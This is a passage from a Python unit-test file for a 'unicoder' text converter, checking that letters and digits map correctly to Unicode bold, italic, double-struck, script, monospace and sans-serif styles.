":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_138_ital_bold_base(self) -> None: uni = unicoder.ital(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_139_ital_bold_base(self) -> None: uni = unicoder.ital(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_140_bold_ital_base(self) -> None: uni = unicoder.bold(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_141_bold_ital_base(self) -> None: uni = unicoder.bold(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_142_bold_ital_base(self) -> None: uni = unicoder.bold(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_143_bold_ital_base(self) -> None: uni = unicoder.bold(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_150_bold_numm(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_151_bold_numm(self) -> None: uni = unicoder.convert("fat", base_0123456789) self.assertEqual(uni, ":𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗") def test_152_bold_numm(self) -> None: uni = unicoder.convert("bold", base_0123456789) self.assertEqual(uni, ":𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗") def test_155_bold_numm(self) -> None: uni = unicoder.bold(base_0123456789) self.assertEqual(uni, ":𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗") def test_156_bold_numm(self) -> None: uni = unicoder.bold(base_0123456789) self.assertEqual(uni, ":𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗") def test_160_ital_numm(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_161_ital_numm(self) -> None: uni = unicoder.convert("slant", base_0123456789) self.assertEqual(uni, base_0123456789) def test_162_ital_numm(self) -> None: uni = unicoder.convert("ital", base_0123456789) self.assertEqual(uni, base_0123456789) def test_170_bold_base_sz(self) -> None: uni = unicoder.convert("fix", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":abcxyzABCXYZ0123456789ß") def test_171_bold_base_sz(self) -> None: uni = unicoder.convert("fat", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝐚𝐛𝐜𝐱𝐲𝐳𝐀𝐁𝐂𝐗𝐘𝐙𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝛃") def test_172_bold_base_sz(self) -> None: uni = unicoder.convert("bold", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝐚𝐛𝐜𝐱𝐲𝐳𝐀𝐁𝐂𝐗𝐘𝐙𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝛃") def 
test_180_ital_base_sz(self) -> None: uni = unicoder.convert("fix", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":abcxyzABCXYZ0123456789ß") def test_181_ital_base_sz(self) -> None: uni = unicoder.convert("slant", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝑎𝑏𝑐𝑥𝑦𝑧𝐴𝐵𝐶𝑋𝑌𝑍0123456789𝛽") def test_182_ital_base_sz(self) -> None: uni = unicoder.convert("ital", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝑎𝑏𝑐𝑥𝑦𝑧𝐴𝐵𝐶𝑋𝑌𝑍0123456789𝛽") def test_190_bold_ital_base_sz(self) -> None: uni = unicoder.convert("fix", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":abcxyzABCXYZ0123456789ß") def test_191_bold_ital_base_sz(self) -> None: uni = unicoder.convert("fatslant", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝒂𝒃𝒄𝒙𝒚𝒛𝑨𝑩𝑪𝑿𝒀𝒁𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝜷") def test_192_bold_ital_base_sz(self) -> None: uni = unicoder.convert("italbold", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝒂𝒃𝒄𝒙𝒚𝒛𝑨𝑩𝑪𝑿𝒀𝒁𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝜷") # def test_200_norm_double(self) -> None: uni = unicoder.convert("fix", ":abcxyzABCXYZ") self.assertEqual(uni, ":abcxyzABCXYZ") def test_201_norm_double(self) -> None: uni = unicoder.convert("double", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫") def test_202_norm_double(self) -> None: uni = unicoder.convert("wide", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫") def test_203_norm_double(self) -> None: uni = unicoder.convert("double", ":AB-DEFG-IJKLM-O---STUVWXY-") self.assertEqual(uni, ":𝔸𝔹-𝔻𝔼𝔽𝔾-𝕀𝕁𝕂𝕃𝕄-𝕆---𝕊𝕋𝕌𝕍𝕎𝕏𝕐-") uni = unicoder.convert("double", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ") def test_204_norm_double(self) -> None: uni = unicoder.convert("wide", ":AB-DEFG-IJKLM-O---STUVWXY-") self.assertEqual(uni, ":𝔸𝔹-𝔻𝔼𝔽𝔾-𝕀𝕁𝕂𝕃𝕄-𝕆---𝕊𝕋𝕌𝕍𝕎𝕏𝕐-") uni = unicoder.convert("wide", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ") def test_205_norm_double(self) -> None: uni = unicoder.double(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫") def test_206_norm_double(self) -> None: uni = unicoder.double(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫") def test_207_norm_double(self) -> None: uni = unicoder.double(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ") def test_208_norm_double(self) -> None: uni = unicoder.double(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ") def test_210_bold_double(self) -> None: uni = unicoder.convert("fix", ":abcxyzABXY") self.assertEqual(uni, ":abcxyzABXY") def test_211_bold_double(self) -> None: uni = unicoder.convert("fatdouble", ":abcxyzABXY") self.assertEqual(uni, ":𝕒𝕓𝕔𝕩𝕪𝕫𝔸𝔹𝕏𝕐") def test_212_bold_double(self) -> None: uni = unicoder.convert("boldwide", ":abcxyzABXY") self.assertEqual(uni, ":𝕒𝕓𝕔𝕩𝕪𝕫𝔸𝔹𝕏𝕐") def test_215_bold_double(self) -> None: uni = unicoder.bold(unicoder.double(":abcxyzABXY")) self.assertEqual(uni, ":𝕒𝕓𝕔𝕩𝕪𝕫𝔸𝔹𝕏𝕐") def test_216_bold_double(self) -> None: uni = unicoder.bold(unicoder.double(":abcxyzABXY")) self.assertEqual(uni, ":𝕒𝕓𝕔𝕩𝕪𝕫𝔸𝔹𝕏𝕐") def test_240_numm_double(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_241_numm_double(self) -> None: uni = unicoder.convert("double", base_0123456789) self.assertEqual(uni, ":𝟘𝟙𝟚𝟛𝟜𝟝𝟞𝟟𝟠𝟡") def test_242_numm_double(self) -> None: uni = unicoder.convert("wide", base_0123456789) self.assertEqual(uni, ":𝟘𝟙𝟚𝟛𝟜𝟝𝟞𝟟𝟠𝟡") def test_245_numm_double(self) -> None: 
        uni = unicoder.double(base_0123456789)
        self.assertEqual(uni, ":𝟘𝟙𝟚𝟛𝟜𝟝𝟞𝟟𝟠𝟡")
    def test_246_numm_double(self) -> None:
        uni = unicoder.double(base_0123456789)
        self.assertEqual(uni, ":𝟘𝟙𝟚𝟛𝟜𝟝𝟞𝟟𝟠𝟡")
    #
    def test_250_norm_script(self) -> None:
        uni = unicoder.convert("fix", ":abcxyzABCXYZ")
        self.assertEqual(uni, ":abcxyzABCXYZ")
    def test_251_norm_script(self) -> None:
        uni = unicoder.convert("script", ":abcd-f-hijklmn-pqrstuvwxyz")
        self.assertEqual(uni, ":𝒶𝒷𝒸𝒹-𝒻-𝒽𝒾𝒿𝓀𝓁𝓂𝓃-𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏")
        uni = unicoder.convert("script", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏")
    def test_252_norm_script(self) -> None:
        uni = unicoder.convert("round", ":abcd-f-hijklmn-pqrstuvwxyz")
        self.assertEqual(uni, ":𝒶𝒷𝒸𝒹-𝒻-𝒽𝒾𝒿𝓀𝓁𝓂𝓃-𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏")
        uni = unicoder.convert("round", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏")
    def test_253_norm_script(self) -> None:
        uni = unicoder.convert("script", ":A-CD--G--JK--NOPQ-STUVWXYZ")
        self.assertEqual(uni, ":𝒜-𝒞𝒟--𝒢--𝒥𝒦--𝒩𝒪𝒫𝒬-𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵")
        uni = unicoder.convert("script", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵")
    def test_254_norm_script(self) -> None:
        uni = unicoder.convert("round", ":A-CD--G--JK--NOPQ-STUVWXYZ")
        self.assertEqual(uni, ":𝒜-𝒞𝒟--𝒢--𝒥𝒦--𝒩𝒪𝒫𝒬-𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵")
        uni = unicoder.convert("round", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵")
    def test_255_norm_script(self) -> None:
        uni = unicoder.script(":abcd-f-hijklmn-pqrstuvwxyz")
        self.assertEqual(uni, ":𝒶𝒷𝒸𝒹-𝒻-𝒽𝒾𝒿𝓀𝓁𝓂𝓃-𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏")
        uni = unicoder.script(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏")
    def test_256_norm_script(self) -> None:
        uni = unicoder.script(":abcd-f-hijklmn-pqrstuvwxyz")
        self.assertEqual(uni, ":𝒶𝒷𝒸𝒹-𝒻-𝒽𝒾𝒿𝓀𝓁𝓂𝓃-𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏")
        uni = unicoder.script(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏")
    def test_257_norm_script(self) -> None:
        uni = unicoder.script(":A-CD--G--JK--NOPQ-STUVWXYZ")
        self.assertEqual(uni, ":𝒜-𝒞𝒟--𝒢--𝒥𝒦--𝒩𝒪𝒫𝒬-𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵")
        uni = unicoder.script(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵")
    def test_258_norm_script(self) -> None:
        uni = unicoder.script(":A-CD--G--JK--NOPQ-STUVWXYZ")
        self.assertEqual(uni, ":𝒜-𝒞𝒟--𝒢--𝒥𝒦--𝒩𝒪𝒫𝒬-𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵")
        uni = unicoder.script(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵")
    def test_260_bold_script(self) -> None:
        uni = unicoder.convert("fix", ":abcxyzABXY")
        self.assertEqual(uni, ":abcxyzABXY")
    def test_261_bold_script(self) -> None:
        uni = unicoder.convert("fatscript", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃")
    def test_262_bold_script(self) -> None:
        uni = unicoder.convert("boldround", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃")
    def test_263_bold_script(self) -> None:
        uni = unicoder.convert("fatscript", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩")
    def test_264_bold_script(self) -> None:
        uni = unicoder.convert("boldround", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩")
    def test_272_bold_script(self) -> None:
        uni = unicoder.bold(unicoder.script(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ":𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃")
    def test_273_bold_script(self) -> None:
        uni = unicoder.bold(unicoder.script(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ":𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩")
    def test_277_bold_script(self) -> None:
        uni = unicoder.script(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ":𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃")
    def test_278_bold_script(self) -> None:
        uni = unicoder.script(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, ":𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩")
    def test_290_numm_script(self) -> None:
        uni = unicoder.convert("fix", base_0123456789)
        self.assertEqual(uni, base_0123456789)
    def test_291_numm_script(self) -> None:
        uni = unicoder.convert("script", base_0123456789)
        self.assertEqual(uni, base_0123456789)
    def test_292_numm_script(self) -> None:
        uni = unicoder.convert("round", base_0123456789)
        self.assertEqual(uni, base_0123456789)
    def test_295_numm_script(self) -> None:
        uni = unicoder.script(base_0123456789)
        self.assertEqual(uni, base_0123456789)
    def test_296_numm_script(self) -> None:
        uni = unicoder.script(base_0123456789)
        self.assertEqual(uni, base_0123456789)
    #
    def test_300_norm_courier(self) -> None:
        uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz)
        self.assertNotEqual(base_abcdefghijklmnopqrstuvwxyz, sans_abcdefghijklmnopqrstuvwxyz)
        self.assertNotEqual(mono_abcdefghijklmnopqrstuvwxyz, sans_abcdefghijklmnopqrstuvwxyz)
    def test_301_norm_courier(self) -> None:
        uni = unicoder.convert("courier", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, mono_abcdefghijklmnopqrstuvwxyz)
    def test_302_norm_courier(self) -> None:
        uni = unicoder.convert("mono", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, mono_abcdefghijklmnopqrstuvwxyz)
    def test_303_norm_courier(self) -> None:
        uni = unicoder.convert("courier", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_304_norm_courier(self) -> None:
        uni = unicoder.convert("mono", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_305_norm_courier(self) -> None:
        uni = unicoder.courier(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, mono_abcdefghijklmnopqrstuvwxyz)
    def test_306_norm_courier(self) -> None:
        uni = unicoder.courier(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, mono_abcdefghijklmnopqrstuvwxyz)
    def test_307_norm_courier(self) -> None:
        uni = unicoder.courier(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_308_norm_courier(self) -> None:
        uni = unicoder.courier(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_340_numm_courier(self) -> None:
        uni = unicoder.convert("fix", base_0123456789)
        self.assertEqual(uni, base_0123456789)
    def test_341_numm_courier(self) -> None:
        uni = unicoder.convert("courier", base_0123456789)
        self.assertEqual(uni, mono_0123456789)
    def test_342_numm_courier(self) -> None:
        uni = unicoder.convert("mono", base_0123456789)
        self.assertEqual(uni, mono_0123456789)
    def test_345_numm_courier(self) -> None:
        uni = unicoder.courier(base_0123456789)
        self.assertEqual(uni, mono_0123456789)
    def test_346_numm_courier(self) -> None:
        uni = unicoder.courier(base_0123456789)
        self.assertEqual(uni, mono_0123456789)
    def test_350_norm_initial(self) -> None:
        uni = unicoder.convert("init", "Hello world")
        self.assertEqual(uni, "ℍello world")
    def test_351_norm_initial(self) -> None:
        uni = unicoder.convert("caps", "Hello world")
        self.assertEqual(uni, "ℍello world")
    def test_352_norm_initial(self) -> None:
        uni = unicoder.convert("init", "say Hello world")
        self.assertEqual(uni, "say ℍello world")
    def test_353_norm_initial(self) -> None:
        uni = unicoder.convert("caps", "say Hello world")
        self.assertEqual(uni, "say ℍello world")
    def test_354_norm_initial(self) -> None:
        uni = unicoder.convert("init", "Say Hello world")
        self.assertEqual(uni, "𝕊ay Hello world")
    def test_355_norm_initial(self) -> None:
        uni = unicoder.convert("caps", "Say Hello world")
        self.assertEqual(uni, "𝕊ay Hello world")
    def test_360_norm_initial(self) -> None:
        uni = unicoder.initial("Hello world")
        self.assertEqual(uni, "ℍello world")
    def test_361_norm_initial(self) -> None:
        uni = unicoder.initial("say Hello world")
        self.assertEqual(uni, "say ℍello world")
    def test_362_norm_initial(self) -> None:
        uni = unicoder.initial("Say Hello world")
        self.assertEqual(uni, "𝕊ay Hello world")
    def test_363_norm_initial(self) -> None:
        uni = unicoder.initial("Say Hello world.\nYes, I will do.")
        self.assertEqual(uni, "𝕊ay Hello world.\n𝕐es, I will do.")
    #
    def test_400_norm_sans(self) -> None:
        uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz)
        self.assertNotEqual(base_abcdefghijklmnopqrstuvwxyz, sans_abcdefghijklmnopqrstuvwxyz)
        self.assertNotEqual(mono_abcdefghijklmnopqrstuvwxyz, sans_abcdefghijklmnopqrstuvwxyz)
    def test_401_norm_sans(self) -> None:
        uni = unicoder.convert("sans", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, sans_abcdefghijklmnopqrstuvwxyz)
    def test_402_norm_sans(self) -> None:
        uni = unicoder.convert("vect", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, sans_abcdefghijklmnopqrstuvwxyz)
    def test_403_norm_sans(self) -> None:
        uni = unicoder.convert("sans", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_404_norm_sans(self) -> None:
        uni = unicoder.convert("vect", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_405_norm_sans(self) -> None:
        uni = unicoder.sans(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, sans_abcdefghijklmnopqrstuvwxyz)
    def test_406_norm_sans(self) -> None:
        uni = unicoder.sans(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, sans_abcdefghijklmnopqrstuvwxyz)
    def test_407_norm_sans(self) -> None:
        uni = unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_408_norm_sans(self) -> None:
        uni = unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_410_numm_sans(self) -> None:
        uni = unicoder.convert("fix", base_0123456789)
        self.assertEqual(uni, base_0123456789)
    def test_411_numm_sans(self) -> None:
        uni = unicoder.convert("sans", base_0123456789)
        self.assertEqual(uni, sans_0123456789)
    def test_412_numm_sans(self) -> None:
        uni = unicoder.convert("vect", base_0123456789)
        self.assertEqual(uni, sans_0123456789)
    def test_415_numm_sans(self) -> None:
        uni = unicoder.sans(base_0123456789)
        self.assertEqual(uni, sans_0123456789)
    def test_416_numm_sans(self) -> None:
        uni = unicoder.sans(base_0123456789)
        self.assertEqual(uni, sans_0123456789)
    def test_421_bold_sans(self) -> None:
        uni = unicoder.convert("boldsans", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, bold_sans_abcdefghijklmnopqrstuvwxyz)
    def test_422_bold_sans(self) -> None:
        uni = unicoder.convert("fatvect", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, bold_sans_abcdefghijklmnopqrstuvwxyz)
    def test_423_bold_sans(self) -> None:
        uni = unicoder.convert("boldsans", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_424_bold_sans(self) -> None:
        uni = unicoder.convert("fatvect", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_425_bold_sans(self) -> None:
        uni = unicoder.bold(unicoder.sans(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, bold_sans_abcdefghijklmnopqrstuvwxyz)
    def test_426_bold_sans(self) -> None:
        uni = unicoder.sans(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, bold_sans_abcdefghijklmnopqrstuvwxyz)
    def test_427_bold_sans(self) -> None:
        uni = unicoder.bold(unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_428_bold_sans(self) -> None:
        uni = unicoder.sans(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))
        self.assertEqual(uni, bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_430_numm_bold_sans(self) -> None:
        uni = unicoder.convert("fix", base_0123456789)
        self.assertEqual(uni, base_0123456789)
    def test_431_numm_bold_sans(self) -> None:
        uni = unicoder.convert("boldsans", base_0123456789)
        self.assertEqual(uni, bold_sans_0123456789)
    def test_432_numm_bold_sans(self) -> None:
        uni = unicoder.convert("fatvect", base_0123456789)
        self.assertEqual(uni, bold_sans_0123456789)
    def test_435_numm_bold_sans(self) -> None:
        uni = unicoder.bold(unicoder.sans(base_0123456789))
        self.assertEqual(uni, bold_sans_0123456789)
    def test_436_numm_bold_sans(self) -> None:
        uni = unicoder.sans(unicoder.bold(base_0123456789))
        self.assertEqual(uni, bold_sans_0123456789)
    def test_441_ital_sans(self) -> None:
        uni = unicoder.convert("italsans", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_442_ital_sans(self) -> None:
        uni = unicoder.convert("slantvect", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_443_ital_sans(self) -> None:
        uni = unicoder.convert("italsans", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_444_ital_sans(self) -> None:
        uni = unicoder.convert("slantvect", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
    def test_445_ital_sans(self) -> None:
        uni = unicoder.ital(unicoder.sans(base_abcdefghijklmnopqrstuvwxyz))
        self.assertEqual(uni, ital_sans_abcdefghijklmnopqrstuvwxyz)
    def test_446_ital_sans(self) -> None:
